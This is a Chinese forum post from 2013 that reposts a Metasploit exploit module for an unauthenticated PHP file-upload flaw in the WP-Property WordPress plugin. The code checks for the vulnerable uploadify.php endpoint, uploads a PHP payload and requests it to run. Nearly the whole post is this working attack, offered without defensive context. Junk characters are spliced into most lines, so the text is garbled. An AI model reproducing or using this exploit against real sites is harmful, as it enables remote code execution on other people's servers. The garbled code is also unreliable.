WordPress WP-Property PHP 文件上传漏洞
W' t7 X* J( P6 x8 m/ ~* i" G7 |+ r+ r5 V
## # This file is part of the Metasploit Framework and may be subject to
7 d+ V% j3 ?6 q' l4 F1 @0 l! D, A$ L* P: A* h. ]
# redistribution and commercial restrictions. Please see the Metasploit& g; N' E3 j5 m6 Y' r* [
' r# L$ C4 |; J* ?1 ?# Framework web site for more information on licensing and terms of use.& m8 K( @8 T2 d) F4 o
' V Z! j& y7 p0 B
# http://metasploit.com/framework/ ##1 _, S7 i2 m2 n/ C
8 ?; l" L6 |0 y5 D" i, R& s9 f7 v
# ?; U: J* J9 I+ r, D2 I, @. ~6 h% o8 u; ?
9 U4 R' O1 [$ ~' ]* \: a; {/ y( s+ r+ X! A4 d$ g
require 'msf/core'
7 N1 W. F$ M- [require 'msf/core/exploit/php_exe') |* w7 M0 |3 S" L8 h2 @. @& |0 @
& Q7 U8 `( [2 ^$ }/ X, f5 Dclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',# E; `6 @! p( E0 Y. Z( R9 @
'Description' => %q{1 _ S1 r2 q9 D8 l- ~1 l2 ~7 a
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
. X5 ~7 m) o* N- X6 ~( j: R[% Q- ?# E" y2 w$ }# w
'Sammy FORGIT', # initial discovery/ A4 `3 c3 u, Z
'James Fitts <fitts.james[at]gmail.com>' # metasploit module4 u3 ^/ l$ p$ U8 a' h
],
, v0 {0 _+ t6 i' O8 v'License' => MSF_LICENSE,( a. W) n1 I, F; S# L8 Y6 t; g
'References' =>
2 C# i4 |" |, d) L4 [- ^[( G1 ^2 R: A* I/ g- g! }6 m
[ 'OSVDB', '82656' ],# u u3 `2 R# V! K6 M
[ 'BID', '53787' ],
" _4 f' H/ k/ W/ n j$ d9 U) @( f[ 'EDB', '18987'],9 t7 a& Y7 K4 W) V/ X! r% _7 x
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
7 J7 O4 c& R) D6 U( Z],
) S; [9 e" m1 `* }'Payload' =>
; e* r7 Q& m+ Y& x/ s" [8 w{
" F- x) @) N% I'BadChars' => "\x00",
; Q( J; ]+ b/ D, T' j6 e' t# N2 }7 {},
8 a# D9 v% e7 | W, n'Platform' => 'php',( u5 A3 y" ]& c. z( l; S
'Arch' => ARCH_PHP,; J( U7 L9 l/ |7 G z9 ^, D7 z
'Targets' =>9 ?6 ]5 ]' Z7 B/ M, B0 n
[" a0 j4 ?& E4 B U" Z5 \
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],, E6 n3 S& G3 w8 w
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]! H+ Y( v) G0 I' \
],
8 }# K: Y! y# K9 A'DefaultTarget' => 0,) U* ` H/ ]1 V4 Q8 [: j) n. b
'DisclosureDate' => 'Mar 26 2012'))
9 d+ T6 B4 t* r( A* y9 `3 Y* h$ E& Q" t- p5 X
register_options(
2 [- e, z$ C2 G% H6 h[2 j3 Z% f/ v9 ?3 _& h4 F( O
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 D/ {3 |! M/ T5 P
], self.class)6 J( T0 B, \/ N6 L
end7 t" h* L+ ~7 {! Z* w: N% C% J9 G7 q
- t, S. L+ ?; r% Z% kdef check
. X$ n6 D2 W) g$ Muri = target_uri.path) c, r/ s* U5 M: F" v4 i( c
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
( ?$ e6 U% [+ v' O3 j4 n: d' y'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"( ?( j' q5 H# W1 t$ ~$ w
})/ p/ J+ Y+ ]! M1 k) }
$ e9 h( z& _; Z5 f) d& s7 [! S
if not res or res.code != 200
, x* ?2 R& `9 P8 N# k2 @* hreturn Exploit::CheckCode::Unknown( V, R% J* a2 `0 U6 ]
end
- P+ t r$ }" ^: B* r) n
" i% e3 e1 {7 Xreturn Exploit::CheckCode::Appears! a& }. T! l3 H# N9 X
end
# Y+ u8 d1 ]. A6 b1 l: E& T8 E6 \3 A; t: f9 D
def exploit
d0 T ?" e. F1 T4 _uri = target_uri.path
+ t1 u, r; ] v; v9 X; Iuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)5 Q9 `) o( v2 P- w' g& h4 _9 |# U( ?
5 G6 O9 b3 D+ }( u% k# e7 Z1 G: f- udata = Rex::MIME::Message.new5 x3 a1 `0 X1 \( u, v s
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")0 b7 F% J- d: r% m* A9 X. D# J
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
$ @" X4 L0 N/ f; I: r' Apost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
% y* A) H; T9 F: \
8 Z) C% y+ b# v o% U+ yprint_status("#{peer} - Uploading payload #{@payload_name}"): \1 K. e3 u t: t1 N' l9 e' X
res = send_request_cgi({
; {9 I6 F1 l( V8 q! k1 L'method' => 'POST',8 ~7 ^$ }+ d) K( X. {. P( x
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
! i/ |$ z1 Z& d7 k7 J6 \'ctype' => "multipart/form-data; boundary=#{data.bound}",
# ~6 Y. M5 C% g) ^2 S3 V+ m'data' => post_data- {( m9 n7 C q" d# N
})
: U I8 D h5 O
+ o: `# X, H7 l* sif not res or res.code != 200 or res.body !~ /#{@payload_name}/
) V& f$ L% f6 y# x7 ?fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")6 a: {( N( i/ X# [) {( v# k# I
end/ x$ L& E; U( B. M0 X' }+ V
- g: i0 _1 f4 E4 z' k0 Rupload_uri = res.body( R, U8 `9 |6 ?5 H9 v8 P7 p/ G
. g: ^. y5 S8 z/ e! W6 {6 Q
print_status("#{peer} - Executing payload #{@payload_name}")
: f. P- k/ ?! K" [res = send_request_raw({
* J; P. D9 l9 y'uri' => upload_uri,5 x) K0 U* w8 ~! u
'method' => 'GET'
; r+ ^+ ^/ v6 V$ R5 U8 ?})6 d& q2 a4 j, \4 X( S
end
+ _7 t& }1 i1 ]4 B9 cend! W+ [# ]& S. u
: S/ r1 s/ r- d8 n6 H) h7 F- W0 b
不要问我这写的是什么 怎么利用 我是说msf.
5 D7 `0 ^/ V( g' G, Q4 s
1 G& }; d1 e6 d- h |
发表于 2013-1-4 19:51:30
收藏
支持
反对